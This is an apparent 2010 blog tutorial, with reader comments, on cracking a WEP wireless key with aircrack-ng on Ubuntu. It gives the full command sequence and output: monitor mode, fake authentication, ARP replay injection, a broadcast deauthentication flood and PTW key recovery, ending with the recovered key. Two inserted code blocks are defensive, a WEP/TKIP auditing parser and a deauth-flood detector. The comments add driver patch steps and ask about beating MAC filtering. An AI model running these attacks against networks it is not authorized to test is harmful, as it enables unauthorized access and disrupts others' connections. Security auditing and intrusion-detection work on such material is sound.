The information below is not intended to harm other people. Cracking other people's networks is considered illegal in most countries!!
The other day my sister called me up because she couldn't connect to her wireless network any more.
She had been playing with her network connections and broke everything. She didn't know the key for her wireless access point, and the access point couldn't be reset because it is in the attic and we couldn't reach it.
So I thought I'd give it a try and hack the access point.
Here are the steps I followed:
First I checked whether my laptop could see the wireless network.
The network I want to crack is wifi9/7
Let's start cracking the key with the installation of aircrack-ng:
sudo apt-get install aircrack-ng
List the adapters:
wim@wim-ubuntu:~$ sudo airmon-ng

Interface       Chipset         Driver
wlan0           Intel 3945ABG   iwl3945 - [phy0]
I have only one wireless card in my laptop (wlan0) so this is obviously the card I have to use.
Next, I have to put my wireless card in monitor mode:
wim@wim-ubuntu:~$ sudo airmon-ng start wlan0

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
899     NetworkManager
906     avahi-daemon
977     avahi-daemon
1113    wpa_supplicant
2744    dhclient
Process with PID 2744 (dhclient) is running on interface wlan0

Interface       Chipset         Driver
wlan0           Intel 3945ABG   iwl3945 - [phy0]
                                (monitor mode enabled on mon0)
mon0 is a new interface which I will use for monitoring. If I run the previous command again, mon0 should be listed as an interface:
wim@wim-ubuntu:~$ sudo airmon-ng

Interface       Chipset         Driver
wlan0           Intel 3945ABG   iwl3945 - [phy0]
mon0            Intel 3945ABG   iwl3945 - [phy0]
Next, launch airodump on the new interface to hop all the channels and show the wireless networks that can be found:
wim@wim-ubuntu:~$ sudo airodump-ng mon0

 CH  2 ][ Elapsed: 24 s ][ 2010-02-08 19:43

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:21:91:F2:06:D9   -1        0        0    0 123  -1
 00:1D:7E:43:52:33  -48       61       52    2   1  54e  WPA2 CCMP   PSK  cisco
 00:1B:11:6E:78:6D  -79       72        0    0   9  54   WEP  WEP         wifi6-2
 00:24:01:65:97:69  -79       54        0    0   6  54   WEP  WEP         wifi9/7
 00:1D:19:23:BC:57  -84       19       14    0   9  54 . WPA2 CCMP   PSK  GCS
 00:23:EE:CB:5A:61  -87       10        1    0  11  54e  WPA  TKIP   PSK  telenet-039FF
 00:21:91:F3:7D:B6  -88        4        0    0   9  54   WEP  WEP         WIFI 18

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:21:91:F2:06:D9  00:24:2B:8B:4F:81  -83    0 - 1     0       39  baranilew,bbox2-b0c7,default
 00:1D:7E:43:52:33  00:1B:77:D9:A9:52    0  54e-54e     0       49  cisco
The network I want to crack (wifi9/7) is listed. I can see that it is secured by WEP. If the security is WPA, it's a lot harder to crack.
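The airodump-ng listing above is also the quickest audit of which networks in range are still on WEP or open and need to be moved to WPA2/WPA3. The parser below is an added example (not part of this post or of aircrack-ng): it reads the screen output exactly as printed above, splits the access-point table from the client table, and grades every BSSID by its ENC/CIPHER columns. The regular expression and the grading rules are this example's own; the only data is the output shown on the page.

```python
import re

# Screen output reproduced from the airodump-ng run shown above (page data,
# not constructed), re-wrapped one row per line.
AIRODUMP_OUTPUT = """\
 CH  2 ][ Elapsed: 24 s ][ 2010-02-08 19:43

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:21:91:F2:06:D9   -1        0        0    0 123  -1
 00:1D:7E:43:52:33  -48       61       52    2   1  54e  WPA2 CCMP   PSK  cisco
 00:1B:11:6E:78:6D  -79       72        0    0   9  54   WEP  WEP         wifi6-2
 00:24:01:65:97:69  -79       54        0    0   6  54   WEP  WEP         wifi9/7
 00:1D:19:23:BC:57  -84       19       14    0   9  54 . WPA2 CCMP   PSK  GCS
 00:23:EE:CB:5A:61  -87       10        1    0  11  54e  WPA  TKIP   PSK  telenet-039FF
 00:21:91:F3:7D:B6  -88        4        0    0   9  54   WEP  WEP         WIFI 18

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:21:91:F2:06:D9  00:24:2B:8B:4F:81  -83    0 - 1     0       39  baranilew,bbox2-b0c7,default
 00:1D:7E:43:52:33  00:1B:77:D9:A9:52    0  54e-54e     0       49  cisco
"""

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"

# One access-point row. ENC/CIPHER/AUTH/ESSID are optional because airodump-ng
# leaves them blank until it has decoded a beacon; the MB column may carry a
# trailing "e" or " ." flag; the ESSID may contain spaces ("WIFI 18").
AP_ROW = re.compile(
    r"^\s*(?P<bssid>" + MAC + r")\s+"
    r"(?P<pwr>-?\d+)\s+(?P<beacons>\d+)\s+(?P<data>\d+)\s+(?P<data_ps>\d+)\s+"
    r"(?P<ch>-?\d+)\s+(?P<mb>-?\d+e?(?:\s\.)?)"
    r"(?:\s+(?P<enc>OPN|WEP|WPA2|WPA)"
    r"(?:\s+(?P<cipher>(?:CCMP|TKIP|WEP|WRAP)(?:\s(?:CCMP|TKIP))?))?"
    r"(?:\s+(?P<auth>PSK|MGT|SKA|OPN))?"
    r"(?:\s+(?P<essid>.+?))?)?\s*$"
)


def parse_access_points(text):
    """Return one dict per row of the access-point table, stopping at the
    client (BSSID/STATION) table that follows it."""
    aps, in_ap_table = [], False
    for line in text.splitlines():
        if "BSSID" in line and "STATION" in line:
            break                       # client table starts; APs are done
        if "BSSID" in line and "ESSID" in line:
            in_ap_table = True          # header of the access-point table
            continue
        if in_ap_table and (m := AP_ROW.match(line)):
            row = m.groupdict()
            for key in ("pwr", "beacons", "data", "data_ps", "ch"):
                row[key] = int(row[key])
            aps.append(row)
    return aps


def assess(ap):
    """Defender's grading of one network's ENC/CIPHER columns."""
    enc, cipher = ap["enc"], ap["cipher"]
    if enc is None:
        return "unknown: no beacon decoded yet"
    if enc == "OPN":
        return "CRITICAL: open network, all traffic is cleartext"
    if enc == "WEP":
        return "CRITICAL: WEP key is recoverable from captured traffic, migrate to WPA2-CCMP or WPA3"
    if enc == "WPA" or cipher == "TKIP":
        return "WARNING: WPA/TKIP is deprecated, move to WPA2-CCMP or WPA3"
    return f"ok: {enc}/{cipher}"


def findings(text):
    """Map each BSSID to (ESSID, channel, assessment)."""
    return {ap["bssid"]: (ap["essid"], ap["ch"], assess(ap))
            for ap in parse_access_points(text)}


def wep_networks(text):
    """ESSIDs that still use WEP, sorted, for the migration list."""
    return sorted(ap["essid"] for ap in parse_access_points(text) if ap["enc"] == "WEP")


if __name__ == "__main__":
    for bssid, (essid, ch, verdict) in findings(AIRODUMP_OUTPUT).items():
        print(f"{bssid}  ch {ch:>3}  {essid or '<hidden>':<14} {verdict}")
```

Run against the listing above it reports three WEP networks (wifi6-2, wifi9/7 and "WIFI 18"), flags telenet-039FF for WPA/TKIP, and leaves the first row as unknown because airodump-ng had not yet decoded a beacon for it.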
Next, run airodump-ng again, but this time lock it to the channel used by the network we will crack, in this case channel 6:
wim@wim-ubuntu:~$ sudo airodump-ng --channel 6 mon0

 CH  6 ][ Elapsed: 16 s ][ 2010-02-08 19:51 ][ fixed channel mon0: 1

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:21:91:F2:06:D9   -1   0        0        0    0 133  -1
 00:1D:7E:43:52:33  -34   1       10        1    0   1  54e  WPA2 CCMP   PSK  cisco
 00:24:01:65:97:69  -75  96      117        0    0   6  54   WEP  WEP         wifi9/7

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:21:91:F2:06:D9  00:24:2B:8B:4F:81  -85    0 - 5     0        7  default
 00:1D:7E:43:52:33  00:1B:77:D9:A9:52    0   1e- 1     0       10  cisco
Just let the previous screen run and open a new console window to run a fake authentication attempt.
The value after -a is the MAC address (BSSID) of the network we want to crack; the -e value is the name (ESSID) of the network.
wim@wim-ubuntu:~$ sudo aireplay-ng --fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
19:56:24  Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6

19:56:24  Sending Authentication Request (Open System) [ACK]
19:56:24  Authentication successful
19:56:24  Sending Association Request [ACK]
19:56:24  Association successful (AID: 1)
The association is successful. This means the target access point doesn't use MAC filtering, which is good for me: I don't have to spoof my MAC address.
Now everything is ready to crack the key.
First, if airodump-ng is still running in your first console, stop it and start it again with the -w option so the captured data is saved to a file:
wim@wim-ubuntu:~$ sudo airodump-ng --channel 6 -w /home/wim/crackwepwifi -i mon0

 CH  6 ][ Elapsed: 0 s ][ 2010-02-08 20:01

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:24:01:65:97:69  -72 100       29        4    0   6  54   WEP  WEP         wifi9/7

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
To actually crack the key, I need a lot of data. In this case I've only got 4 packets, where I need around 100000, so I have to speed things up a little bit by launching aireplay-ng in injection mode in a new console window:
wim@wim-ubuntu:~$ sudo aireplay-ng -3 -b 00:24:01:65:97:69 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
20:07:31  Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
Saving ARP requests in replay_arp-0208-200731.cap
You should also start airodump-ng to capture replies.
Read 63 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Now keep aireplay-ng and airodump-ng running and launch the deauth attack in another console:
wim@wim-ubuntu:~$ sudo aireplay-ng --deauth 0 -a 00:24:01:65:97:69 mon0
20:10:02  Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
20:10:02  Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:02  Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03  Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03  Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
Let everything run. After a few minutes you should receive ARP requests and the data count will start increasing very fast. I noticed it went a little faster when I also tried to connect to the target network from Ubuntu.
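The "Sending DeAuth to broadcast" lines above are exactly what a wireless IDS should catch: an access point deauthenticating a single client now and then is normal, but dozens of broadcast deauthentication frames per second carrying one BSSID are not. The detector below is an added example (not part of this post or of aircrack-ng). It decodes the 24-byte 802.11 MAC header of raw frames (it assumes the radiotap header has already been stripped), keeps a sliding window of deauthentication/disassociation frames per BSSID, and raises one alert per burst. The capture it runs on is constructed inline; the BSSID is the one shown in the output above, the client MAC, timestamps and reason codes are sample values chosen for the example.

```python
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def parse_mgmt_frame(frame: bytes):
    """Decode the 802.11 MAC header of a raw frame (no radiotap prefix, an
    assumption of this example). Returns the fields of a deauthentication or
    disassociation frame, or None for any other frame."""
    if len(frame) < 26:            # 24-byte header + 2-byte reason code
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3       # 0 = management frame
    subtype = (fc0 >> 4) & 0xF
    if ftype != 0 or subtype not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        return None
    return {
        "subtype": subtype,
        "dst": mac_str(frame[4:10]),      # addr1: receiver
        "src": mac_str(frame[10:16]),     # addr2: transmitter
        "bssid": mac_str(frame[16:22]),   # addr3: BSSID in management frames
        "reason": struct.unpack_from("<H", frame, 24)[0],
    }


class DeauthFloodDetector:
    """Alert when one BSSID emits `threshold` or more deauth/disassoc frames
    within `window` seconds; a burst produces a single alert."""

    def __init__(self, threshold: int = 10, window: float = 5.0):
        self.threshold, self.window = threshold, window
        self.events = defaultdict(deque)    # bssid -> timestamps inside window
        self.active = set()                 # bssids currently in a flagged burst
        self.alerts = []

    def feed(self, ts: float, frame: bytes):
        info = parse_mgmt_frame(frame)
        if info is None:
            return None
        q = self.events[info["bssid"]]
        q.append(ts)
        while q and ts - q[0] > self.window:   # drop frames older than the window
            q.popleft()
        if len(q) < self.threshold:
            self.active.discard(info["bssid"])  # burst is over, re-arm
            return None
        if info["bssid"] in self.active:
            return None                         # already reported this burst
        self.active.add(info["bssid"])
        alert = {"bssid": info["bssid"], "count": len(q), "ts": ts,
                 "broadcast": info["dst"] == BROADCAST, "reason": info["reason"]}
        self.alerts.append(alert)
        return alert


def build_frame(bssid, dst, subtype=SUBTYPE_DEAUTH, reason=7):
    """Construct a minimal raw management frame for the sample capture
    (frame control, duration, addr1..3, sequence control, 2-byte body)."""
    fc0 = subtype << 4                      # type 0 (management), version 0
    header = (struct.pack("<BBH", fc0, 0, 0) + mac_bytes(dst) + mac_bytes(bssid)
              + mac_bytes(bssid) + struct.pack("<H", 0))
    return header + struct.pack("<H", reason)


def sample_capture():
    """Constructed capture: one ordinary deauth from the AP to a client, a
    beacon, then a ten-second broadcast deauth flood carrying the page's BSSID."""
    ap, client = "00:24:01:65:97:69", "00:1b:77:d9:a9:52"
    cap = [(0.0, build_frame(ap, client, reason=3)),
           (0.5, build_frame(ap, BROADCAST, subtype=SUBTYPE_BEACON))]
    cap += [(1.0 + i * 0.25, build_frame(ap, BROADCAST)) for i in range(40)]
    return cap


def run_detector(capture, threshold=10, window=5.0):
    det = DeauthFloodDetector(threshold, window)
    for ts, frame in capture:
        det.feed(ts, frame)
    return det.alerts


if __name__ == "__main__":
    for a in run_detector(sample_capture()):
        print(f"ALERT deauth flood: bssid={a['bssid']} count={a['count']} "
              f"broadcast={a['broadcast']} reason={a['reason']} at t={a['ts']:.2f}s")
```

The single legitimate deauth and the beacon produce nothing; the flood trips the detector at the tenth frame inside the window and is then suppressed until the rate drops below the threshold, so a sustained flood is reported once rather than on every frame. A broadcast destination is worth surfacing separately in the alert, since an access point normally deauthenticates individual clients.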
When there are enough packets captured, it’s time to crack them.
I opened a new console and used the following command, where crackwepwifi-02.ivs is the file airodump-ng created from the -w prefix given earlier:
wim@wim-ubuntu:~$ sudo aircrack-ng -0 -b 00:24:01:65:97:69 /home/wim/crackwepwifi-02.ivs
Opening /home/wim/crackwepwifi-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 88000 ivs.
KEY FOUND! [ 30:36:34:36:39 ] (ASCII: 06469 )
Decrypted correctly: 100%
Got it! The key for the network is 06469.
I could connect to it without a problem and made my sister happy again.




It says [fixed channel mon0] -1.
How can I change it to 1?
Please, anyone help me?
Does it work if you run following commands?
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
make
sudo make install
sudo make unload
sudo reboot
Hey, when I enter sudo aireplay-ng --fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0
with my MAC address and ESSID,
all I get is "aireplay --help".
What is wrong?
I was searching for secured wireless network hacking via Google on Sunday, and I found your page Hacking WEP encryption on Ubuntu | My IT-blog to be extremely useful. Regards gill54@msn.com
Useful tutorial if you want to check your AP security.
Good tutorial, well written. A question though: I get the authentication and association message successful (fake auth), but my MAC address is not listed along with the associated clients... This means if there are no clients associated in the AP, no WEP crack! What am I doing wrong? I did the whole WEP crack with clients already associated using their MAC address and it worked well; the thing is I can't get my MAC address associated with the AP, although it says the association is successful... Thanks a million
I really appreciate your tutorial. I am hacking to learn and not learning to hack. I need your help, please.
When I tried “aireplay-ng deauth” and “aireplay-ng fauth,” It gave me this error: “Waiting for Beacon Frame….” and then “No such BSSID available.” After that, it stopped.
There are many possible root causes of this problem:
- The wireless card is set to a channel which is different from the AP. Solution: Use iwconfig and confirm the card is set to the same channel as the AP.
- The card is scanning channels. Solution: Start airodump-ng with the "-c" or "--channel" parameter and set it to the same channel as the AP.
- The ESSID is wrong. Solution: Enter the correct value. If it contains spaces or special characters then enclose it in quotes. For the complete details, see this FAQ entry.
- The BSSID is wrong. Solution: Enter the correct value.
- You are too far away from the AP and are not receiving any beacons. Solution: You can use tcpdump and/or airodump-ng to confirm you are in fact receiving beacons for the AP. If not, move closer.
- You are not receiving beacons for the AP. Solution: Use "tcpdump -n -vvv -e -s0 -i" to confirm you are receiving beacons. Assuming you have dealt with the potential problems above, it could be the drivers, or you have not put the card into monitor mode.
For all of the above, running airodump-ng and the related text file should provide all the information you require to identify and correct the problem.
To Faisal…
check your card capability on aircrack-ng.com
When I write this command:
sudo airmon-ng
it does not display any interface name, chipset or drivers.
I have installed Ubuntu inside Windows XP.
Please help me.
It works!
the only problem is that it took me 2 hours to hack my own wireless network.
Thanks for this tutorial!
Also I’ve done everything by the book, exactly BUT the last step
sudo aircrack-ng -0 -b 00:24:01:65:97:69 /home/wim/crackwepwifi-02.iv
gives me two results.
1) He says the file or directory does not exists
OR
2) He says the BSSID (or ESSID I forgot) is wrong.
I checked and checked and both are correct.
Do I actually have to create a file, for instance on the desktop, to record the output data from airodump?
I did :
sudo airodump-ng --channel 6 -w /home/redhat/desktop -i mon0
(I just placed that in the terminal, is that enough or should I actually create a file on the desktop for instance and then:
sudo airodump-ng --channel 6 -w /home/redhat/desktop/file -i mon0
)
I almost got it to work!!!!! I’m so close!
1) What do you do if the target host uses MAC filtering?